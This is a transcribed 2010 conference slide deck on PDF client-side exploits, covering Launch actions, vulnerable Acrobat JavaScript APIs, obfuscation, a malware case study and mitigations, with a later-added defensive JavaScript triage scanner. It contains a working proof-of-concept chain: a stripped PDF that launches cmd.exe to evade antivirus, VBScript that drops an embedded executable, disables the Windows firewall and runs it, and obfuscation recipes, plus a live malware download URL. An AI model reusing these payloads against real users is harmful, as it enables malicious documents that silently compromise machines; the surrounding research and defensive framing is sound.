Client Side Exploits using PDF

null0x00 6,496 views 77 slides Oct 26, 2010

About This Presentation

Client Side Exploits using PDF by Ankur Bhargava & Tamaghna Basu @ null Banglore Meet, October, 2010


Slide Content

Client Side Exploits using PDF
C0C0N Security & Hacking Conference

By,
Ankur Bhargava (Infosys Technologies Limited)
Tamaghna Basu (Security Researcher)

Contents
• About PDF
• Launch Action Exploits
• AcroJS Exploits
• Road Ahead
• Tools and References

About PDF
• What is PDF?
• Incidents in the wild
• Why PDF attacks?
• PDF document structure

Potentially Dangerous File / Penetration Document Format
Stands for Adobe Portable Document Format
Exchange and manipulation of electronic data, reliable and platform independent
Has become the most widespread and used document description format throughout the world

Adobe PDF – As a programming language
A PDF document is more than a powerful document format
Has a complete programming language of its own
Dedicated to document creation and manipulation
Relatively strong execution features

Adobe PDF – Security Issues

2010: Still Continuing…
(Timeline figure of 2010 incidents; axis labels: March, April, May, June)

Incidents in the wild
Jun 14 CVE-2010-1297 PDF Adobe 0-Day WEO from [email protected]
Jun 20 CVE-2010-1297 PDF Meeting agenda from [email protected]
Jun 21 CVE-2010-1297 PDF About the recent US-Japan Economic Relations
Jun 21 CVE-2010-1297 PDF Adobe 0-Day About the recent US-Japan Economic Relations - with Poison Ivy
Jun 27 CVE-2009-0927 PDF Discussion on cross-strait maritime cooperation
Jul 6 CVE-2010-1297 PDF EPA's Water Sampling Report from spoofed [email protected]
Jul 14 CVE-2009-4324 PDF President Obama's Detrimental Deadlines

The Reign of Zeus:
Zeus (also known as Zbot, PRG, Wsnpoem, Gorhax and Kneber) is a Trojan horse that steals banking information by keystroke logging.
Found in July 2007 when it was used to steal information from the United States Department of Transportation. It became more widespread in March 2009.
In June 2009, security company Prevx discovered that Zeus had compromised over 74,000 FTP accounts on websites of companies like: Bank of America, NASA, Monster, ABC, Oracle, Cisco, Amazon, BusinessWeek.
ZeuS is sold in the criminal underground as a kit for around $3000-$4000, and is likely the one malware most utilized by criminals specializing in financial fraud. ZeuS has evolved over time and includes a full arsenal of information-stealing features.

The Reign of Zeus
A recent breakthrough in spreading Zeus via PDF files threatens to further the spread of Zeus. The PDF file (detected as Exploit.JS.Pdfka.bui) contained an exploit for the CVE-2010-0188 vulnerability, a buffer overflow that manifests itself when the field containing the image is accessed.
(Figure: CVE-2010-0188 exploit statistics, 2010)

Popular in malwaredomainlist.com

Apple iPhone / iPad / iPod Code Execution and Sandbox Bypass
VUPEN ID - VUPEN/ADV-2010-1992
Release date - 2010-08-03
It is caused by a memory corruption error when processing Compact Font Format (CFF) data within a PDF document, which could be exploited by attackers to execute arbitrary code by tricking a user into visiting a specially crafted web page using Mobile Safari.

Why PDF
• Popularity and usability
• Flexibility, platform independent, rich text
• Trust level is high on PDF – seen as a static piece of information
• Rich API, easy to exploit / misuse
• Dominance of Adobe Reader, huge scope for attack

PDF document structure
The general structure of a PDF file is composed of the following components: header, body, cross-reference (xref) table, and trailer, as shown in figure 1.

PDF Document Structure
(Figure 1: layout of a PDF file)
PDF Header
Body (Objects)
Cross reference Table
Trailer

Launch Action
• Launch Action Api
• Some Examples
• Evading Antivirus
• With embedded EXE

Launch Action Vulnerability
A launch action launches an application or opens or prints a document. Following are the action dictionary entries specific to this type of action.

ENTRIES
S : name
(Required) The type of action that this dictionary describes; shall be Launch for a launch action.
F : file specification
(Required if none of the entries Win, Mac, or Unix is present) The application that shall be launched or the document that shall be opened or printed. If this entry is absent and the conforming reader does not understand any of the alternative entries, it shall do nothing.
Win : dictionary
(Optional) A dictionary containing Windows-specific launch parameters.

Launch Action Vulnerability
PARAMETERS
F : byte string
(Required) The file name of the application that shall be launched or the document that shall be opened or printed, in standard Windows pathname format. If the name string includes a backslash character (\), the backslash shall itself be preceded by a backslash. This value shall be a simple string; it is not a file specification.
P : byte string
(Optional) A parameter string that shall be passed to the application designated by the F entry. This entry shall be omitted if F designates a document.

Launch Action Vulnerability
(Screenshots: open command prompt; open website)

Launch Action Vulnerability
Open notepad.exe

Launch Action Vulnerability
Changing the message

Launch Action Vulnerability
Confidential Data!! If You are Authorized Click on
'Open'. Check 'Do Not Show This Message Again' to
avoid this dialog next time

Launch Action in 9.3.3

Evading Antivirus by Changing the format
You can take any other PDF data type and give it a number by wrapping it in "obj" and "endobj". Then later on, when you want to use that chunk of data, you can reference it, by number, with the "R" operator.
These two examples are equivalent to Acrobat:

2 0 obj
(Hello World)
endobj
3 0 obj
<<
/Example 2 0 R
>>
endobj

3 0 obj
<<
/Example (Hello World)
>>
endobj

Evading Antivirus
What You Can Leave Out
• All page data
• All whitespace, except for end-of-line after comments
• The version number part of %PDF-1.1
• The %%EOF
• The xref table, and thus also startxref
• Most object /Types
So what's actually required?
• %PDF-anything, but if the file is too confusing for Acrobat, you need at least the first number, like %PDF-1.
• A trailer with a /Root dictionary for the Catalog
• A /Pages dictionary, but this can be empty, just as long as it's a dictionary type.
• An /OpenAction if you want to launch your JavaScript upon file open.
• The JavaScript Action.

Evading Antivirus
%PDF-1.
trailer<</Root<</Pages<<>>/OpenAction<</S/Launch/Win<</F(cmd.exe)/P<0A0A0A0A0A0A0A0A4E6F74653A2054686973206973206120736563757265205044462E20546F207669657720746865207365637572656420636F6E74656E7420706C6561736520636C69636B2074686520224F70656E2220627574746F6E2062656C6F772E>>>>>>>>>
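A pdfid-style triage pass over raw PDF bytes, added here as an example (it is not pdfid.py and not the authors' code): it counts the action and script keywords, normalises the #xx name escapes the PDF spec allows so a renamed key still counts, flags the structural pieces the slides say a reader tolerates missing, and reports the Launch target. Both sample documents are constructed for the test.

```javascript
// Added example: keyword triage of raw PDF bytes in the spirit of pdfid.py
// (this is not pdfid.py and not code from the slides).
const SUSPICIOUS = ["/OpenAction", "/AA", "/JS", "/JavaScript", "/Launch", "/EmbeddedFile", "/RichMedia"];

// PDF names may hex-escape any character (/Launc#68 is the same name as /Launch),
// so decode the escapes before matching instead of trusting the literal bytes.
function decodeNames(text) {
  return text.replace(/#([0-9A-Fa-f]{2})/g, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Accepts a Buffer (e.g. fs.readFileSync(path)) or a string of the file's bytes.
function triagePdf(bytes) {
  const raw = Buffer.isBuffer(bytes) ? bytes.toString("latin1") : String(bytes);
  const text = decodeNames(raw);
  const counts = {};
  for (const kw of SUSPICIOUS) {
    // require a non-name character after the keyword so /JS does not match a longer name
    const re = new RegExp(kw + "(?![A-Za-z0-9_])", "g");
    counts[kw] = (text.match(re) || []).length;
  }
  // Pieces a reader tolerates missing but a normal producer always writes ("What You Can Leave Out").
  const anomalies = [];
  if (!/^%PDF-\d\.\d/.test(text)) anomalies.push("incomplete version header");
  if (!/(?:^|[\r\n])xref\b/.test(text)) anomalies.push("no xref table");
  if (!text.includes("startxref")) anomalies.push("no startxref");
  if (!text.includes("%%EOF")) anomalies.push("no %%EOF");
  // First /F(...) after a /Launch: the program the reader would be asked to start.
  const launch = text.match(/\/Launch[\s\S]*?\/F\s*\(([^)]*)\)/);
  const codeVector = counts["/JS"] + counts["/JavaScript"] + counts["/Launch"] > 0;
  const autoRun = counts["/OpenAction"] + counts["/AA"] > 0;
  const verdict = codeVector && autoRun ? "high" : codeVector || anomalies.length >= 2 ? "medium" : "low";
  return { counts, anomalies, launchTarget: launch ? launch[1] : null, verdict };
}

// Constructed sample 1: stripped-down file like the one on the slide, harmless target, escaped name.
const STRIPPED_LAUNCH = "%PDF-1.\ntrailer<</Root<</Pages<<>>/OpenAction<</S/Launc#68/Win<</F(notepad.exe)>>>>>>>>";
// Constructed sample 2: a minimal but complete benign document.
const BENIGN = [
  "%PDF-1.4",
  "1 0 obj<</Type/Catalog/Pages 2 0 R>>endobj",
  "2 0 obj<</Type/Pages/Kids[]/Count 0>>endobj",
  "xref", "0 3", "0000000000 65535 f ",
  "trailer<</Root 1 0 R/Size 3>>", "startxref", "0", "%%EOF",
].join("\n");

console.log(triagePdf(STRIPPED_LAUNCH)); // verdict "high", launchTarget "notepad.exe", 4 anomalies
console.log(triagePdf(BENIGN));          // verdict "low", no anomalies
```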

POC: Launching an Embedded exe
Step 1 : Embed the hex content of the exe in a vbscript which extracts it out to the file system and runs it.
Step 2 : Embed that vbscript in the pdf file as comments.
Step 3 : Launch cmd.exe and create another script which extracts out the main vbscript from the pdf and run them both.

Step 1 : Embed the hex content of the exe in a vbscript
Dim b,bl
Function c(d)
c=chr(d)
End Function
' Hex content of the exe as a character array
b=Array(c(77),c(90),c(144),c(0),c(3),c(0), c(0)....,"")
bl = 3072
Set fso = CreateObject("Scripting.FileSystemObject")
Set f = fso.OpenTextFile("helpme.exe", 2, True)
For i = 0 To bl
f.write(b(i))
Next
f.close()
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "netsh firewall set opmode disable", 0, True
WshShell.Run "helpme.exe", 0, False
WshShell.Run "taskkill /IM cmd.exe /F", 0, False

Step 2 : Embed the vbscript in the pdf file as comments
%'SS
%Dim b,bl;Set WshShell = Function c(d);c=chr(d);End
Function;b=Array(c(77),c(90),c(144),c(0),.....,"");bl = 3072;Set fso =
CreateObject("Scripting.FileSystemObject");Set f =
fso.OpenTextFile("helpme.exe", 2, True);For i = 0 To
bl;f.write(b(i));Next;f.close(); Set WshShell =
WScript.CreateObject("WScript.Shell") ;WshShell.Run "netsh
firewall set opmode disable", 0, True;WshShell.Run "helpme.exe",
0, False;WshShell.Run "taskkill /IM cmd.exe /F", 0, False
%'EE
6 0 obj
[/PDF /Text]
endobj

Step 3 : Launch cmd.exe and create another script
/c echo Set
fso=CreateObject("Scripting.FileSystemObject") >
execute.vbs && echo Set
f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True) >>
execute.vbs && echo pf=f.ReadAll >> execute.vbs &&
echo s=InStr(pf,"'SS") >> execute.vbs && echo
e=InStr(pf,"'EE") >> execute.vbs && echo s=Mid(pf,s,e-
s) >> execute.vbs && echo Set
z=fso.OpenTextFile("toexecute.vbs", 2, True) >>
execute.vbs && echo s = Replace(s,"%","") >>
execute.vbs && echo s = Replace(s,";",vbcrlf) >>
execute.vbs && echo z.Write(s) >> execute.vbs &&
execute.vbs && toexecute.vbs

Generated VBScript
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.OpenTextFile("EmbeddedExePoC.pdf", 1, True)
pf=f.ReadAll
s=InStr(pf,"'SS")
e=InStr(pf,"'EE")
s=Mid(pf,s,e-s)
Set z=fso.OpenTextFile("toexecute.vbs", 2, True)
s = Replace(s,"%","")
s = Replace(s,";",vbcrlf)
z.Write(s)

AcroJS
• AcroJS API
• Vulnerable APIs
• Obfuscation Techniques
• Case Study

AcroJS
• Acrobat JavaScript is the cross-platform scripting language of the Adobe® Acrobat® family of products.
• Through JavaScript extensions, the viewer application and its plug-ins expose much of their functionality to document authors, form designers, and plug-in developers.
• This functionality includes the following features:
– Processing forms within the document
– Batch processing collections of PDF documents
– Developing and maintaining online collaboration schemes
– Communicating with local databases
– Controlling multimedia events

JavaScript Actions
• A JavaScript action causes a script to be compiled and executed by the JavaScript interpreter.
• Depending on the nature of the script, various interactive form fields in the document may update their values or change their visual appearances.

PARAMETERS

/S
Type - name
(Required) The type of action that this dictionary describes; must be JavaScript for a JavaScript action.
/JS
Type - text string or text stream
(Required) A text string or text stream containing the JavaScript script to be executed.

Acrojs examples
(Screenshots: launchURL; alert box)
Vulnerable APIs
• getIcon() [CVE-2009-0927]
– Stack-based buffer overflow in Adobe Reader and Adobe Acrobat 9 before 9.1, 8 before 8.1.3, and 7 before 7.1.1 allows remote attackers to execute arbitrary code via a crafted argument to the getIcon method of a Collab object, a different vulnerability than CVE-2009-0658.
• util.printf() [CVE-2008-2992][CVE-2008-1104]
– Stack-based buffer overflow in Adobe Acrobat and Reader 8.1.2 and earlier allows remote attackers to execute arbitrary code via a PDF file that calls the util.printf JavaScript function with a crafted format string argument, a related issue to CVE-2008-1104.
– Stack-based buffer overflow in Foxit Reader before 2.3 build 2912 allows user-assisted remote attackers to execute arbitrary code via a crafted PDF file, related to the util.printf JavaScript function and floating point specifiers in format strings.

Vulnerable APIs
• getAnnots() [CVE-2009-1492]
– The getAnnots Doc method in the JavaScript API in Adobe Reader and Acrobat 9.1, 8.1.4, 7.1.1, and earlier allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that contains an annotation, and has an OpenAction entry with JavaScript code that calls this method with crafted integer arguments.
• customDictionaryOpen() [CVE-2009-1493]
– The customDictionaryOpen spell method in the JavaScript API in Adobe Reader 9.1, 8.1.4, 7.1.1, and earlier on Linux and UNIX allows remote attackers to cause a denial of service (memory corruption) or execute arbitrary code via a PDF file that triggers a call to this method with a long string in the second argument.

Vulnerable APIs
• Doc.media.newPlayer [CVE-2009-4324]
– Use-after-free vulnerability in the Doc.media.newPlayer method in Multimedia.api in Adobe Reader and Acrobat 9.x before 9.3, and 8.x before 8.2 on Windows and Mac OS X, allows remote attackers to execute arbitrary code via a crafted PDF file using ZLib compressed streams, as exploited in the wild in December 2009.
• Collab.collectEmailInfo [CVE-2007-5659]
– Multiple buffer overflows in Adobe Reader and Acrobat 8.1.1 and earlier allow remote attackers to execute arbitrary code via a PDF file with long arguments to unspecified JavaScript methods. NOTE: this issue might be subsumed by CVE-2008-0655.

Obfuscation Techniques
Why?
• To make analysis more difficult
• To avoid detection by virus scanners
Ways?
• Using JavaScript obfuscation
• Using PDF obfuscations (filters)

Javascript Obfuscations : Unlearn Coding Ethics

Distorting format
Normal Code:
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
Obfuscated Code:
function overflow(hex, loop){for (i=0;i<loop;i++){hex = hex + hex;}}

Obfuscating Identifiers
Normal Code:
function execute(data, time)
{
Timelag=5000;
if (time > Timelag)
{
// some code
}
}
function overflow(hex, loop)
{
for (i=0;i<loop;i++)
{
hex = hex + hex;
}
}
Obfuscated Code:
function aeiou(lIlIIlI, O0OOOO0OO000OO)
{
WWMWMWMWMWMW=5000;
if (O0OOOO0OO000OO > WWMWMWMWMWMW)
{
// some code
}
}
function aimpq(xxwmnnx, pqrtxw)
{
for (dqweaa=0; dqweaa < pqrtxw; dqweaa ++)
{
xxwmnnx = xxwmnnx + xxwmnnx;
}
}

Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters
function _____(____,__________)
{
______________=5000;
if (__________>______________)
{
// some code
}
}
function ___(_______, ______)
{
for(________________=0; ________________<______;
________________ ++)
{
_______ = _______ + _______;
}
}

Obfuscating Identifiers – Even Worse
Differentiating with number of underscore characters (the same code on a single line; the line comment has to become a block comment or it swallows the closing braces)
function _____(____,__________){______________=5000;if (__________>______________){/* some code */}}function ___(_______, ______){for(________________=0; ________________<______; ________________ ++){_______ = _______ + _______;}}

Chain of Eval
Normal Code:
app.alert("c0c0n");
Obfuscated Code:
func=eval;
one='app.alert("c0c0n")';
two=eval(one);
three=eval(two);
eval(func(three));

Splitting Javascript
Normal Code:
app.alert("hello world");
Obfuscated Code:
Rt=");";
Td="ert(\"hel";
Ab="ap";
Qw="ld\"";
Kg="p.al";
Gh="lo wor";
eval("hh=Ab+Kg+Td+Gh+Qw+Rt");
eval(hh);

Callee Trick
Function accesses its own source and uses it as a key to decrypt code or data
function decrypt(cypher)
{
var key = arguments.callee.toString();
for (var i = 0; i < cypher.length; i++)
{
plain = key.charCodeAt(i) ^ cypher.charCodeAt(i);
}
...
}

Pdf obfuscations
Using Filters for streams.
Most common encoding techniques: ASCIIHexDecode, ASCII85Decode, LZWDecode, FlateDecode, RunLengthDecode

Case Study
Malware found from www.malwaredomainlist.com
File link: www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
Added on 29th July 2010

VirusTotal report: 5/42 (11.90%)

Analysis

STEP-1
WGET www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on

STEP-2
Behavioral Analysis
Environment
• By using a VM image
• Filemon, Process Monitor, Regmon, TCPView
Results
• The process 'AcroRD32.exe' was trying to connect to the remote site http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on

STEP-3
Pdfid.py

STEP-4
Static/Code Analysis

Word Editor

Decoded the script

Formatted using jsbeautifier.org

Replacing with meaningful identifiers and removing unnecessary comments

Replacing ‘X’ from parameter

Shellcode Analysis
Connecting to…
http://bigiqwars.ru/ppp/exe.php?spl=PDF (newPlayer)&user=admin&exe_acces=on

Road Ahead
• Mitigations
• Adobe's security measures
• Future exploit methods

How can we protect ourselves
• Enable automatic updates: it sounds simple, but you will need to turn it on in the software settings to make it happen by default.
• Disable PDF browser integration: most browsers will open PDFs without asking. An infected PDF will deliver its payload without warning, hiding in the background.
• Always install the latest patch/update, even for older Adobe product versions.
• Disable JavaScript.
• Uncheck 'Allow non-PDF file attachments with external applications' to prevent the launch action vulnerability.
• PDF alternatives such as Foxit are worthwhile, as long as auto updates are turned on; however, alternative programs are just as vulnerable to malware as they gain popularity.

Road Ahead
Focus less on JavaScript exploits
Attackers focusing more on embedded objects inside PDF, i.e. Flash
Adobe to introduce sandboxing to limit Reader exploits

Tools And References

Tools used
Malzilla
Mozilla add-on: JavaScript Deobfuscator by Wladimir Palant
VMware Player
Sysinternals tools: Process Monitor, Filemon, Regmon, TCPView
WinHex
HexEdit

References
www.malwaredomainlist.com
www.adobe.com/
www.bigiqwars.ru/ppp/exp/pdf.php?user=admin&pdf_acces=on
www.blog.didierstevens.com
www.jsbeautifier.org
http://research.globalthoughtz.com
http://www.zdnet.com/
http://www.scansafe.com/
http://www.computerworld.com/s/article/9176117/
http://www.darkreading.com/
http://www.virustotal.com/
http://recon.cx/
http://www.blog.zynamics.com

References (continued)
http://www.marketwire.com/
http://www.symantec.com/
http://www.securelist.com/en/analysis
http://contagiodump.blogspot.com/
http://www.f-secure.com/
http://www.securelist.com/
http://www.secureworks.com/
http://en.wikipedia.org/
http://www.malwaredomainlist.com/
http://blogs.adobe.com/
http://blog.fireeye.com/
http://intrepidusgroup.com/
http://www.vupen.com

Thank you
Tamaghna Basu
[email protected]
twitter.com\titanlambda
tamahawk-techguru.blogspot.com
Ankur Bhargava
[email protected]